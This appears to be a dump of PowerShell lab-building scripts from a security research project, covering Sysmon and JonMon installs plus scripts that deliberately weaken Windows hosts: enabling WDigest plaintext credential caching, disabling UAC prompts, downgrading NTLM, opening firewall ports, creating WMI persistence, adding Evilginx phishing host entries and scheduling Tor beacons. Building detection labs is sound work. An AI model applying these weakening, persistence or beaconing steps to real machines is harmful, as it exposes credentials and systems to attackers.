https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Create-AD.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Install-ADFS.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Install-ADFS.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Join-Domain.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Join-Domain.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Prepare-ADFS.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Prepare-ADFS.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Enable-TLS12.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Enable-TLS12.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Import-PfxCert.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez @Cyb3rWard0g
2 | # License: GPLv3
3 | configuration Import-PfxCert
4 | {
5 | param
6 | (
7 | [Parameter()]
8 | [System.String]$PfxCertPath,
9 |
10 | [Parameter()]
11 | [ValidateSet('CurrentUser', 'LocalMachine')]
12 | [System.String]$Location = 'LocalMachine',
13 |
14 | [Parameter()]
15 | [ValidateNotNullOrEmpty()]
16 | [System.String]$Store = 'My',
17 |
18 | [Parameter()]
19 | [System.Boolean]$Exportable = $true,
20 |
21 | [Parameter()]
22 | [System.Management.Automation.PSCredential]$PfxCertCreds
23 | )
24 |
25 | Import-DscResource -ModuleName xPSDesiredStateConfiguration
26 |
27 | Node localhost
28 | {
29 | LocalConfigurationManager
30 | {
31 | ActionAfterReboot = 'ContinueConfiguration'
32 | ConfigurationMode = 'ApplyOnly'
33 | RebootNodeIfNeeded = $true
34 | }
35 |
36 | xScript ImportPFX
37 | {
38 | SetScript =
39 | {
40 | $certFilepath = Get-ChildItem -Path $using:pfxCertPath
41 | $certStore = 'Cert:' | Join-Path -ChildPath $using:Location | Join-Path -ChildPath $using:Store
42 |
43 | if ($using:Exportable -eq $True)
44 | {
45 | Import-PfxCertificate -Exportable -CertStoreLocation $certStore -FilePath $certFilepath.FullName -Password $using:PfxCertCreds.Password
46 | }
47 | else
48 | {
49 | Import-PfxCertificate -CertStoreLocation $certStore -FilePath $certFilepath.FullName -Password $using:PfxCertCreds.Password
50 | }
51 | }
52 | GetScript =
53 | {
54 | # This block must return a hashtable. The hashtable must only contain one key Result and the value must be of type String.
55 | return @{ "Result" = "false" }
56 | }
57 | TestScript =
58 | {
59 | # If it returns $false, the SetScript block will run. If it returns $true, the SetScript block will not run.
60 | return $false
61 | }
62 | }
63 | }
64 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Import-PfxCert.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Import-PfxCert.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-AADConnect.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez @Cyb3rWard0g
2 | # License: GPLv3
3 |
4 | configuration Install-AADConnect {
5 | Import-DscResource -ModuleName xPSDesiredStateConfiguration, ComputerManagementDsc
6 |
7 | Node localhost
8 | {
9 | LocalConfigurationManager
10 | {
11 | ConfigurationMode = 'ApplyOnly'
12 | RebootNodeIfNeeded = $true
13 | }
14 |
15 | # ***** Download AADConnect *****
16 | xRemoteFile DownloadAADConnect {
17 | DestinationPath = "C:\ProgramData\AzureADConnect.msi"
18 | Uri = "https://download.microsoft.com/download/B/0/0/B00291D0-5A83-4DE7-86F5-980BC00DE05A/AzureADConnect.msi"
19 | }
20 |
21 | # ***** Install AADConnect *****
22 | xScript InstallAADConnect
23 | {
24 | # reference: https://github.com/pthoor/AzureARMTemplates/blob/ddd09734a3817e459d3dbfb41fc96c9b011e0205/ADFS%20Lab/DSC/adDSC/adDSCConfiguration.ps1
25 | SetScript = {
26 | $exe="$env:SystemRoot\system32\msiexec.exe"
27 | $MSIPath = "C:\ProgramData\AzureADConnect.msi"
28 |
29 | Invoke-Expression "& `"$exe`" /i $MSIPath /qn /passive /forcerestart"
30 | }
31 | GetScript =
32 | {
33 | # This block must return a hashtable. The hashtable must only contain one key Result and the value must be of type String.
34 | return @{ "Result" = "false" }
35 | }
36 | TestScript =
37 | {
38 | # If it returns $false, the SetScript block will run. If it returns $true, the SetScript block will not run.
39 | return $false
40 | }
41 | DependsOn = "[xRemoteFile]DownloadAADConnect"
42 | }
43 |
44 | PendingReboot RebootOnSignalFromAADConnect
45 | {
46 | Name = 'RebootOnSignalFromAADConnect'
47 | DependsOn = "[xScript]InstallAADConnect"
48 | }
49 |
50 | xService AWDS
51 | {
52 | Name = "ADWS"
53 | State = "Running"
54 | DependsOn = '[PendingReboot]RebootOnSignalFromAADConnect'
55 | }
56 | }
57 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-AADConnect.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Install-AADConnect.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-HyperV.ps1:
--------------------------------------------------------------------------------
1 | Configuration Install-HyperV {
2 |
3 | Import-DscResource -ModuleName PsDesiredStateConfiguration
4 |
5 | Node "localhost" {
6 |
7 | LocalConfigurationManager {
8 | RebootNodeIfNeeded = $true
9 | ActionAfterReboot = 'ContinueConfiguration'
10 | }
11 |
12 | WindowsFeature Hyper-V {
13 | Name = "Hyper-V"
14 | Ensure = "Present"
15 | }
16 | WindowsFeature DHCP {
17 | Name = "DHCP"
18 | Ensure = "Present"
19 | }
20 | WindowsFeature RemoteAccess {
21 | Name = "RemoteAccess"
22 | Ensure = "Present"
23 | }
24 | WindowsFeature Routing {
25 | Name = "Routing"
26 | Ensure = "Present"
27 | }
28 | WindowsFeature RSAT-Hyper-V-Tools {
29 | Name = "RSAT-Hyper-V-Tools"
30 | Ensure = "Present"
31 | }
32 | WindowsFeature RSAT-DHCP {
33 | Name = "RSAT-DHCP"
34 | Ensure = "Present"
35 | }
36 | WindowsFeature RSAT-RemoteAccess {
37 | Name = "RSAT-RemoteAccess"
38 | Ensure = "Present"
39 | }
40 | }
41 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-HyperV.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Install-HyperV.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/Install-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/Install-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/PostInstall-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/PostInstall-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/Prepare-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/Prepare-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/PrepareAD-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/PrepareAD-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/software/Install-Sysmon.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/software/Install-Sysmon.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-BadBlood.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 |
3 | # Install Active Directory Module for Windows PowerShell
4 | Write-Host "Installing Active Directory module for Windows PowerShell"
5 |
6 | Import-Module ServerManager
7 | Add-WindowsFeature -Name "RSAT-AD-PowerShell" -IncludeAllSubFeature
8 |
9 | # Installing Chocolatey
10 | write-host "Installing Chocolatey.."
11 |
12 | Set-ExecutionPolicy Bypass -Scope Process -Force
13 | Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
14 | choco feature enable -n allowGlobalConfirmation
15 |
16 | write-host "Installing choco packages.."
17 | choco install git
18 |
19 | [string]$PathToGit = "C:\Program Files\Git\bin\git.exe"
20 | [Array]$Arguments = "clone", "https://github.com/davidprowe/badblood.git", "C:\ProgramData\badblood"
21 | & $PathToGit $Arguments
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-JonMon.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://copdips.com/2019/12/Using-Powershell-to-retrieve-latest-package-url-from-github-releases.html
6 | # https://stackoverflow.com/a/25127597
7 | # https://github.com/jsecurity101/JonMon/wiki#installation
8 |
9 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
10 | Resolve-DnsName github.com
11 | Resolve-DnsName raw.githubusercontent.com
12 |
13 | write-host "[+] Getting latest versions from JonMon GitHub project..."
14 | $releases = Invoke-RestMethod -Uri 'https://api.github.com/repos/jsecurity101/JonMon/releases'
15 | $latest = $releases[0]
16 | $assets = $latest.assets
17 |
18 | write-host "[+] JonMon Release Name: $($latest.name)"
19 |
20 | # Initializing Web Client
21 | $wc = new-object System.Net.WebClient
22 |
23 | # Downloading Assets
24 | foreach ($asset in $assets){
25 | $downloadUrl = $asset.browser_download_url
26 | write-Host "[+] Downloading" $asset.name "From" $downloadUrl
27 | $OutputFile = Split-Path $downloadUrl -Leaf
28 | $File = "C:\ProgramData\$OutputFile"
29 | # Check to see if file already exists
30 | if (Test-Path $File) { Write-host " [!] $File already exist"; return }
31 | # Download if it does not exists
32 | $wc.DownloadFile($downloadUrl, $File)
33 | # If for some reason, a file does not exists, STOP
34 | if (!(Test-Path $File)) { Write-Error "$File does not exist" -ErrorAction Stop }
35 | # Decompress if it is zip file
36 | if ($File.ToLower().EndsWith(".zip"))
37 | {
38 | # Unzip file
39 | write-Host " [+] Decompressing $OutputFile .."
40 | $UnpackName = (Get-Item $File).Basename
41 | $JonMonFolder = "C:\ProgramData\$UnpackName"
42 | expand-archive -path $File -DestinationPath $JonMonFolder
43 | if (!(Test-Path $JonMonFolder)) { Write-Error "$File was not decompressed successfully" -ErrorAction Stop }
44 | }
45 | }
46 |
47 | # Installing JonMon
48 | $JonMonLocation = Join-Path $JonMonFolder "JonMon"
49 |
50 | write-Host "[+] Setting location to $JonMonLocation..."
51 | Set-Location $JonMonLocation
52 |
53 | write-Host "[+] Installing JonMon..."
54 | & $JonMonLocation\JonMon-Service.exe -i
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-PowerAutomate.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://learn.microsoft.com/en-us/power-automate/desktop-flows/install-silently
6 | # https://learn.microsoft.com/en-us/microsoft-edge/extensions-chromium/developer-guide/alternate-distribution-options#use-the-windows-registry-windows-only
7 | # https://learn.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration
8 | # https://learn.microsoft.com/en-us/power-platform/admin/manage-application-users#create-an-application-user
9 |
10 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
11 |
12 | write-host "[+] Downloading Power Automate for desktop.."
13 | $Url = "https://go.microsoft.com/fwlink/?linkid=2102613"
14 |
15 | # Initializing Web Client
16 | $wc = new-object System.Net.WebClient
17 |
18 | $request = [System.Net.WebRequest]::Create($Url)
19 | $response = $request.GetResponse()
20 | $OutputFile = [System.IO.Path]::GetFileName($response.ResponseUri)
21 | $response.Close()
22 | $File = "C:\ProgramData\$OutputFile"
23 |
24 | # Check to see if file already exists
25 | if (Test-Path $File) { Write-host " [!] $File already exist"; return }
26 | # Download if it does not exists
27 | write-host "[+] Downloading installer from $($response.ResponseUri).."
28 | $wc.DownloadFile($Url, $File)
29 | # If for some reason, a file does not exists, STOP
30 | if (!(Test-Path $File)) { Write-Error "$File does not exist" -ErrorAction Stop }
31 |
32 | write-host "[*] Installing Power Automate for Desktop.."
33 | & $File -Silent -Install -ACCEPTEULA
34 |
35 | # Set up MS Edge extensions registry
36 | $RegistryKey = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist"
37 | if(!(Test-Path $RegistryKey)){
38 | Write-Host "[+] Creating $RegistryKey .."
39 | New-Item $RegistryKey -Force
40 | }
41 | Write-Host "[+] Setting up property to install and enable Mirosoft Power Automate extension.."
42 | New-ItemProperty -Path $RegistryKey -Name "1" -Value "kagpabjoboikccfdghpdlaaopmgpgfdc;https://edge.microsoft.com/extensionwebstorebase/v1/crx" -PropertyType "String" -force
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-Sysmon.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://medium.com/@cosmin.ciobanu/enhanced-endpoint-detection-using-sysmon-and-wef-3b65d491ff95
6 |
7 | [CmdletBinding()]
8 | param (
9 | [string]$SysmonConfigUrl = "https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/configs/sysmon/sysmon.xml"
10 | )
11 |
12 | write-host "[+] Processing Sysmon Installation.."
13 |
14 | $URL = "https://download.sysinternals.com/files/Sysmon.zip"
15 | Resolve-DnsName download.sysinternals.com
16 | Resolve-DnsName github.com
17 | Resolve-DnsName raw.githubusercontent.com
18 |
19 | $OutputFile = Split-Path $Url -leaf
20 | $File = "C:\ProgramData\$OutputFile"
21 |
22 | # Download File
23 | write-Host "[+] Downloading $OutputFile .."
24 | $wc = new-object System.Net.WebClient
25 | $wc.DownloadFile($Url, $File)
26 | if (!(Test-Path $File)) { Write-Error "File $File does not exist" -ErrorAction Stop }
27 |
28 | # Decompress if it is zip file
29 | if ($File.ToLower().EndsWith(".zip"))
30 | {
31 | # Unzip file
32 | write-Host " [+] Decompressing $OutputFile .."
33 | $UnpackName = (Get-Item $File).Basename
34 | $SysmonFolder = "C:\ProgramData\$UnpackName"
35 | $SysmonBinary = "$SysmonFolder\Sysmon.exe"
36 | expand-archive -path $File -DestinationPath $SysmonFolder
37 | if (!(Test-Path $SysmonFolder)) { Write-Error "$File was not decompressed successfully" -ErrorAction Stop }
38 | }
39 |
40 | # Downloading Sysmon Configuration
41 | write-Host "[+] Downloading Sysmon config.."
42 | $SysmonFile = "C:\ProgramData\sysmon.xml"
43 | $wc.DownloadFile($SysmonConfigUrl, $SysmonFile)
44 | if (!(Test-Path $SysmonFile)) { Write-Error "File $SysmonFile does not exist" -ErrorAction Stop }
45 |
46 | # Installing Sysmon
47 | write-Host "[+] Installing Sysmon.."
48 | & $SysmonBinary -i C:\ProgramData\sysmon.xml -accepteula
49 |
50 | write-Host "[+] Setting Sysmon to start automatically.."
51 | & sc.exe config Sysmon start= auto
52 |
53 | # Setting Sysmon Channel Access permissions
54 | write-Host "[+] Setting up Channel Access permissions for Microsoft-Windows-Sysmon/Operational "
55 | wevtutil set-log Microsoft-Windows-Sysmon/Operational /ca:'O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)'
56 | #New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational" -Name "ChannelAccess" -PropertyType String -Value "O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)" -Force
57 |
58 | write-Host " [*] Verifying if Sysmon is running.."
59 | $s = Get-Service -Name Sysmon
60 | while ($s.Status -ne 'Running') { Start-Service Sysmon; Start-Sleep 3 }
61 | Start-Sleep 5
62 | write-Host " [*] Sysmon is running.."
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Add-EvilGinx-Hosts.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param (
6 | [Parameter(Mandatory=$true)]
7 | [string]$ServerAddresses,
8 |
9 | [Parameter(Mandatory=$true)]
10 | [string]$ServerDNSFQDN
11 | )
12 |
13 | $ErrorActionPreference = "Stop"
14 |
15 | $hostsFilePath = "$($Env:WinDir)\system32\Drivers\etc\hosts"
16 | $prefixStrings = @("www","login","example","subdomainhere","api","github","fls-na","images-na","outlook","account")
17 |
18 | Foreach ($string in $prefixStrings){
19 | $hostname = $string, $ServerDNSFQDN -join "."
20 | $hostEntry = "$ServerAddresses $hostname"
21 |
22 | Write-Host "[+] Adding $hostEntry to $hostsFilePath.."
23 | Add-Content -Value $hostEntry -Path $hostsFilePath
24 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Configure-PSRemoting.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Set up PSRemoting
5 | # https://docs.microsoft.com/windows/win32/winrm/installation-and-configuration-for-windows-remote-management.
6 | $ServiceName = 'WinRM'
7 | $arrService = Get-Service -Name $ServiceName
8 |
9 | if ($arrService.Status -eq 'Running')
10 | {
11 | Write-Host "$ServiceName Service is now Running"
12 | }
13 | else
14 | {
15 | Write-host 'Enabling WinRM..'
16 | winrm quickconfig -q
17 | <#The winrm quickconfig command (or the abbreviated version winrm qc) performs these operations.
18 | - Starts the WinRM service, and sets the service startup type to auto-start.
19 | - Configures a listener for the ports that send and receive WS-Management protocol messages using either HTTP or HTTPS on any IP address.
20 | - Defines ICF exceptions for the WinRM service, and opens the ports for HTTP and HTTPS.#>
21 | }
22 | # Enable PowerShell remoting.
23 | Enable-PSRemoting -Force
24 | # Create firewall rule for WinRM. The default HTTPS port is 5986.
25 | New-NetFirewallRule -Name "WinRM HTTPS" -DisplayName "WinRM HTTPS" -Enabled True -Profile "Any" -Action "Allow" -Direction "Inbound" -LocalPort 5986 -Protocol "TCP"
26 | # Create new self-signed-certificate to be used by WinRM.
27 | $Thumbprint = (New-SelfSignedCertificate -DnsName $env:COMPUTERNAME -CertStoreLocation Cert:\LocalMachine\My).Thumbprint
28 | # Create WinRM HTTPS listener.
29 | $Cmd = "winrm create winrm/config/Listener?Address=*+Transport=HTTPS @{Hostname=""$env:COMPUTERNAME ""; CertificateThumbprint=""$Thumbprint""}"
30 | & cmd.exe /C $Cmd
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Create-TestScheduledTask.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez @Cyb3rWard0g
2 | # Description: A scheduled task that triggers every 10 minutes and sends a GET request to DuckDuckGo and KeyBase Tor services"
3 | $action=New-ScheduledTaskAction -Execute "$PSHome\powershell.exe" -Argument "@('3g2up14pq6kufc4m.onion.to','fncuwbiisyh6ak3i.onion.ws') | ForEach-Object { Invoke-WebRequest -Uri $_}"
4 | $trigger = New-ScheduledTaskTrigger `
5 | -Once `
6 | -At (Get-Date) `
7 | -RepetitionInterval (New-TimeSpan -Minutes 10) `
8 | -RepetitionDuration (New-TimeSpan -Days (365 * 20))
9 | Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "TestMDEWebRequest" -Description "Testing Web Requests to trigger MDE"
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Disarm-Box.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | $ErrorActionPreference = "Stop"
5 |
6 | # Registry configurations
7 | # References:
8 | # https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
9 | # https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers
10 | # https://github.com/eladshamir/Internal-Monologue/blob/85134e4ebe5ea9e7f6b39d4b4ad467e40a0c9eca/InternalMonologue/InternalMonologue.cs
11 |
12 | $regConfig = @"
13 | regKey,name,value,type
14 | "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","LmCompatibilityLevel",2,"DWord"
15 | "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0","NTLMMinClientSec",536870912,"DWord"
16 | "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0","RestrictSendingNTLMTraffic",0,"DWord"
17 | "@
18 |
19 | Write-host "Setting up Registry keys for additional settings.."
20 | $regConfig | ConvertFrom-Csv | ForEach-Object {
21 | if(!(Test-Path $_.regKey)){
22 | Write-Host $_.regKey " does not exist.."
23 | New-Item $_.regKey -Force
24 | }
25 | Write-Host "Setting " $_.regKey
26 | New-ItemProperty -Path $_.regKey -Name $_.name -Value $_.value -PropertyType $_.type -force
27 | }
28 |
29 | # Enable Remote Registry Service
30 | $ServiceName = 'remoteregistry'
31 | $arrService = Get-Service -Name $ServiceName
32 |
33 | if ($arrService.Status -eq 'Running')
34 | {
35 | Write-Host "$ServiceName Service is now Running"
36 | }
37 | else
38 | {
39 | Write-host 'Enabling Remote Registry..'
40 | & sc.exe start remoteregistry
41 | write-Host "Setting Remote Registry to start automatically.."
42 | & sc.exe config remoteregistry start= auto
43 | }
44 |
45 | # Setting UAC level to Never Notify
46 | Write-Host "Setting UAC level to Never Notify.."
47 | Set-ItemProperty -Force -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0
48 |
49 | # *** Registry modified to allow storage of wdigest credentials ***
50 | Write-Host "Setting WDigest to use logoncredential.."
51 | Set-ItemProperty -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value "1"
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Disarm-Firewall.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | $ErrorActionPreference = "Stop"
5 |
6 | # Firewall Changes
7 | Write-Host "Allow ICMP Traffic through firewall"
8 | & netsh advfirewall firewall add rule name="ALL ICMP V4" protocol=icmpv4:any,any dir=in action=allow
9 |
10 | Write-Host "Enable WMI traffic through firewall"
11 | & netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
12 |
13 | Write-Host "Enable Inbound RPC Dynamic Ports"
14 | # Reference:
15 | # https://serverfault.com/questions/430705/how-do-i-allow-remote-iisreset-through-the-firewall-on-win-server-2008
16 | # https://stackoverflow.com/questions/21092050/comexception-when-trying-to-get-application-pools-using-servermanager
17 | # Local port: Dynamic RPC
18 | # Remote port: ALL
19 | # Protocol number: 6
20 | # Executable: %windir%\\system32\\dllhost.exe
21 | # Remote privilege: Administrator
22 | & netsh advfirewall firewall add rule name="COM+ Remote Administration (All Programs)" dir=in action=allow description="" program="$Env:WinDir\system32\dllhost.exe" enable=yes localport=RPC protocol=tcp
23 |
24 | Write-Host "Enable Explorer.exe Inbound (i.e. COM Method ShellWindows)"
25 | & netsh advfirewall firewall add rule name="Windows Explorer UDP" dir=in action=allow description="" program="$Env:WinDir\explorer.exe" enable=yes localport=any protocol=udp remoteip=localsubnet
26 | & netsh advfirewall firewall add rule name="Windows Explorer TCP" dir=in action=allow description="" program="$Env:WinDir\explorer.exe" enable=yes localport=any protocol=tcp remoteip=localsubnet
27 |
28 | ## Configured firewall to allow SMB
29 | Write-Host "Enable File and Printer Sharing"
30 | & netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Invoke-WMISubscription.ps1:
--------------------------------------------------------------------------------
1 | # ##########################################
2 | # Permanent WMI Subscription #
3 | # Consumer Class: CommandLineEventConsumer #
4 | ############################################
5 |
6 | $EventFilterArgs = @{
7 | EventNamespace = 'root/cimv2'
8 | Name = 'NotepadProcessStarted1'
9 | Query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"
10 | QueryLanguage = 'WQL'
11 | }
12 |
13 | $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Property $EventFilterArgs
14 |
15 | $CommandLineConsumerArgs = @{
16 | Name = 'CLConsumer'
17 | CommandLineTemplate = "powershell.exe -c Add-Content -Value 'CommandLineEventConsumer' -Path C:\ProgramData\WMIEventing.txt"
18 | }
19 |
20 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Property $CommandLineConsumerArgs
21 |
22 | $FilterToConsumerArgs = @{
23 | Filter = $Filter
24 | Consumer = $Consumer
25 | }
26 |
27 | $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Property $FilterToConsumerArgs
28 |
29 | # Cleanup
30 | #$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'CLConsumer'"
31 | #$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'NotepadProcessStarted1'"
32 | #$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
33 | #$FilterConsumerBindingToCleanup | Remove-WmiObject
34 | #$EventConsumerToCleanup | Remove-WmiObject
35 | #$EventFilterToCleanup | Remove-WmiObject
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Register-PADMachine.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://learn.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration
6 | # https://github.com/Azure/azure-powershell/blob/main/src/Alb/utils/Unprotect-SecureString.ps1
7 |
8 | [CmdletBinding()]
9 | param (
10 | [Parameter(Mandatory=$true)]
11 | [System.Security.SecureString]$clientSecret,
12 |
13 | [Parameter(Mandatory=$true)]
14 | [String]$appClientId,
15 |
16 | [Parameter(Mandatory=$true)]
17 | [String]$tenantId,
18 |
19 | [Parameter(Mandatory=$true)]
20 | [String]$environmentId
21 | )
22 |
23 | $ssPtr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($clientSecret)
24 |
25 | try {
26 | Write-Host "[*] Registering $env:COMPUTERNAME to Power Automate platform .."
27 | Write-output [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($ssPtr) | C:\'Program Files (x86)'\'Power Automate Desktop'\PAD.MachineRegistration.Silent.exe -register -applicationid $appClientId -clientsecret -tenantid $tenantId -environmentid $environmentId
28 | }
29 | catch {
30 | Write-Warning "Failed registering to Power Platform Error: $($Error[0])"
31 | }
32 | finally {
33 | [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ssPtr)
34 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Rename-Computer.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 |
6 | [CmdletBinding()]
7 | param (
8 | [Parameter(Mandatory=$true)]
9 | [string]$NewComputerName,
10 |
11 | [Parameter(Mandatory=$false)]
12 | [switch]$reboot
13 | )
14 | write-host "Renaming computer to $NewComputerName .."
15 | if($reboot)
16 | {
17 | Rename-Computer -NewName $NewComputerName -force -restart
18 | }
19 | else
20 | {
21 | Rename-Computer -NewName $NewComputerName -force
22 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Set-ProxyServer.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param (
6 | [Parameter(Mandatory=$true)]
7 | [String]$ProxyServer,
8 |
9 | [Parameter(Mandatory=$false)]
10 | [ValidateSetAttribute(1,0)]
11 | [Int]$ProxyEnable = 1
12 | )
13 |
14 | if ($ProxyEnable -eq 1){
15 | Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' -name ProxyServer -Value "$ProxyServer"
